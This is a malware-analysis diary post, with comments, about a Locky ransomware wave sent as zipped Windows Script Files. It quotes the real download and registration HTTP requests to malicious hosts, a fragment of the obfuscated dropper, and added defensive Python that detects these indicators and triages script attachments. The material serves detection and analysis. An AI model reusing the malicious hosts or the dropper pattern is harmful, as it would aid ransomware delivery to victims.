Pretty much all the Locky variants I have looked at over the last couple of days arrived as zipped JavaScript files. Today, I got something slightly different. While the e-mail looked the same overall, the file was a zipped Windows Script File (.wsf). Overall, this isn't all that different. "Windows Script" is essentially JavaScript: a .wsf file is an XML wrapper around one or more JScript (or VBScript) blocks, and the Windows Script Host runs it on double-click exactly as it runs a .js file. The only difference is the

Today's subject for the e-mail was "Transaction details". Once the user runs the script by double-clicking the file, it downloads the actual crypto ransomware:

GET /2tn0o HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: onlybest76.xyz
Connection: Keep-Alive

Just like earlier versions, it then "registers" the infected system with a web server that is identified only by its IP address. There is no hostname to resolve, so you will not see a DNS lookup for it; proxy logs or NetFlow are where this POST shows up:

POST /data/info.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://95.85.19.195/data/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 95.85.19.195
Content-Length: 942
Connection: Keep-Alive
[post data omitted]

Anti-Malware proves its usual value by doing probably slightly better than a blind chicken in protecting you from this malware. You can download a file with packet capture, mail server logs, and the malware sample here (password: "blind chicken").

Between 9am and 1:30pm UTC, I received 1425 e-mails that match this pattern.
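The two request heads above carry the things a network sensor can key on: a User-Agent that impersonates a browser, a Host header that is a literal IP address (so nothing turns up in DNS logs), and an XMLHttpRequest-style POST coming from a script rather than a page. The Python below is an added example and not code from the diary: it parses both request heads (copied from the headers quoted above) and reports which indicators each one triggers, and it shows the mail-gateway side as well, listing the members of a zip attachment whose extension Windows Script Host or mshta.exe would execute. The zip, its member names and contents, and the indicator names are constructed for this example.

```python
"""Detection checks for the zipped-.wsf Locky delivery chain described above.
Added example, not code from the ISC diary: the request heads are taken from
the headers quoted there; the zip, its member names and contents are
constructed placeholders, not the real sample."""
import io
import ipaddress
import re
import zipfile
from pathlib import PurePosixPath

# Extensions Windows Script Host (wscript.exe) or mshta.exe execute on
# double-click: .js in earlier waves, .wsf today, .hta per the comments.
SCRIPT_EXTENSIONS = {".js", ".jse", ".wsf", ".wsh", ".vbs", ".vbe", ".hta"}

def script_members(zip_bytes):
    """Names of zip members that WSH or mshta would run if double-clicked."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return [n for n in zf.namelist()
                if PurePosixPath(n).suffix.lower() in SCRIPT_EXTENSIONS]

def build_sample_zip():
    """Constructed stand-in for the attachment: one .wsf next to a decoy."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("transaction_details.wsf",   # file name is invented
                    "<package><job id='x'><script language='JScript'>"
                    "<![CDATA[ /* placeholder */ ]]></script></job></package>")
        zf.writestr("readme.txt", "decoy")
    return buf.getvalue()

# Request heads as quoted in the diary (the POST body is omitted there too).
SAMPLE_GET = """GET /2tn0o HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: onlybest76.xyz
Connection: Keep-Alive
"""
SAMPLE_POST = """POST /data/info.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://95.85.19.195/data/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 95.85.19.195
Content-Length: 942
Connection: Keep-Alive
"""

def parse_request(raw):
    """Split a raw HTTP/1.1 request head into (method, path, headers)."""
    lines = raw.strip().splitlines()
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break                          # blank line ends the head
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers

def is_bare_ip(host):
    """True when Host is a literal IP, i.e. the client never resolved a name."""
    host = host.strip()
    if host.startswith("["):               # [IPv6]:port
        host = host[1:host.find("]")]
    elif host.count(":") == 1:             # IPv4:port
        host = host.split(":")[0]
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False

UA_MSIE7 = re.compile(r"MSIE 7\.0;.*Windows NT (\d+)\.(\d+)")

def indicators(raw):
    """Names of the campaign's network indicators present in one request head."""
    method, _path, h = parse_request(raw)
    host_is_ip = is_bare_ip(h.get("host", ""))
    found = ["host_is_ip"] if host_is_ip else []
    m = UA_MSIE7.search(h.get("user-agent", ""))
    # IE 7 cannot be installed on Windows 7 (NT 6.1) or later, so "MSIE 7.0"
    # with NT >= 6.1 is not a native browser string. Scripted Windows HTTP
    # clients send it, but so does IE 11 in Compatibility View: weak alone.
    if m and (int(m.group(1)), int(m.group(2))) >= (6, 1):
        found.append("ua_msie7_on_modern_windows")
    if method == "POST" and host_is_ip and \
            h.get("x-requested-with") == "XMLHttpRequest":
        found.append("xhr_post_to_ip")     # the "registration" call
    return found
```

Run `indicators(SAMPLE_GET)` and `indicators(SAMPLE_POST)` to see the difference: the download only trips the User-Agent check, the registration trips all three. The User-Agent check is deliberately weak by itself, since IE 11 in Compatibility View emits the same string; the combination of a bare-IP Host and an XMLHttpRequest POST is what is worth an alert. On the gateway side, `script_members` is the list to quarantine on: blocking those extensions inside zip attachments stops this wave regardless of which script wrapper the next one uses.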
---
Johannes 4506 Posts ISC Handler Aug 30th 2016
Aug 30th 2016
Also using HTA files today & on other odd occasions recently https://myonlinesecurity.co.uk/sent-with-genius-scan-for-ios-pretending-to-come-from-your-own-email-address-leads-to-locky-ransomware/
DVK01 21 Posts
Aug 31st 2016
Greetings:
I'm pretty sure I just got some malware in the form of a ZIP file containing a .wsf file (XML text). It's a bit long to paste. First few lines:

<?xml?>
<package>
<job id='oevPEW'><script language='JScript'></script><script language='JScript'><![CDATA[
String.prototype.toshibasatelliteLAMODAtiiiyamooo = function() {

If this is of any interest, let me know the best way to get it to you. I'm on an Air Force base, so I may not be able to use methods that work for everyone else. Thanks.

-- Karl Vogel vogelke+isc@pobox.com
kvogel 1 Posts
Sep 6th 2016
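The fragment quoted in the comment above shows the shape of a .wsf file: a package/job wrapper around script elements, with the first script block empty and the second hiding its code in a CDATA section that starts by hanging a helper under a long random name on String.prototype. The triage script below is an added example, not part of the comment or the diary; SAMPLE_WSF is a constructed stand-in whose layout and prototype line follow the quoted fragment, while the function body and the ActiveXObject call are invented. A strict XML parser rejects the bare `<?xml?>` declaration in the fragment (the XML grammar requires a version attribute there), so the pieces are pulled out with regular expressions instead of an XML library.

```python
"""Triage helper for a .wsf attachment like the fragment quoted in the comment.
Added example, not part of the comment or the diary. SAMPLE_WSF is constructed:
the package/job/script layout and the String.prototype line follow the quoted
fragment; the function body and the ActiveXObject call are invented."""
import re

SAMPLE_WSF = """<?xml?>
<package>
<job id='oevPEW'><script language='JScript'></script><script language='JScript'><![CDATA[
String.prototype.toshibasatelliteLAMODAtiiiyamooo = function() {
    return this.split("").reverse().join("");   // invented body
};
var dl = new ActiveXObject("MSXML2.XMLHTTP");    // invented, typical downloader plumbing
]]></script></job>
</package>
"""

# The bare "<?xml?>" is not well-formed XML, and real .wsf droppers are rarely
# well-formed anyway, so the elements are located with regexes, not a parser.
JOB_RE = re.compile(r"<job\b([^>]*)>(.*?)</job>", re.S | re.I)
SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.S | re.I)
ATTR_RE = re.compile(r"""(\w+)\s*=\s*(?:'([^']*)'|"([^"]*)")""")
CDATA_RE = re.compile(r"<!\[CDATA\[(.*?)\]\]>", re.S)
# Obfuscators hang helpers off built-in prototypes under random names.
PROTO_RE = re.compile(r"\b(String|Array|Object|Function|Number)\.prototype\.(\w+)\s*=")
# WSH scripts need COM objects for network and file I/O; the ProgIDs tell
# you what the script can do before you read any of the obfuscated code.
ACTIVEX_RE = re.compile(r"""ActiveXObject\s*\(\s*['"]([^'"]+)['"]""")

def _attrs(text):
    """Attribute string -> dict with lower-cased names; WSF allows ' or \" quotes."""
    return {m.group(1).lower(): m.group(2) if m.group(2) is not None else m.group(3)
            for m in ATTR_RE.finditer(text)}

def _script_body(inner):
    """Script text with the CDATA wrapper removed when one is present."""
    cdata = CDATA_RE.search(inner)
    return cdata.group(1) if cdata else inner

def triage(wsf_text):
    """Summarise jobs, script engines and suspicious constructs in a .wsf file."""
    jobs, languages, protos, progids = [], [], [], []
    for job in JOB_RE.finditer(wsf_text):
        jobs.append(_attrs(job.group(1)).get("id", ""))
        for script in SCRIPT_RE.finditer(job.group(2)):
            languages.append(_attrs(script.group(1)).get("language", ""))
            body = _script_body(script.group(2))
            protos += ["%s.prototype.%s" % m.groups() for m in PROTO_RE.finditer(body)]
            progids += ACTIVEX_RE.findall(body)
    return {
        "job_ids": jobs,
        "languages": languages,
        "prototype_methods": protos,
        # A 20+ character method name on a built-in prototype is a cheap flag.
        "long_prototype_names": [p for p in protos if len(p.rsplit(".", 1)[1]) >= 20],
        "activex_progids": progids,
    }
```

`triage(SAMPLE_WSF)` reports one job, two JScript blocks, the oddly named String.prototype helper and the MSXML2.XMLHTTP ProgID. The ProgID list is the part worth keeping in a gateway rule: a script attachment that instantiates an XMLHTTP, ADODB.Stream or WScript.Shell object is a downloader until proven otherwise, whatever the prototype tricks around it look like.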
You can upload the file via our contact form: isc.sans.edu/…
Johannes 4506 Posts ISC Handler |
Sep 6th 2016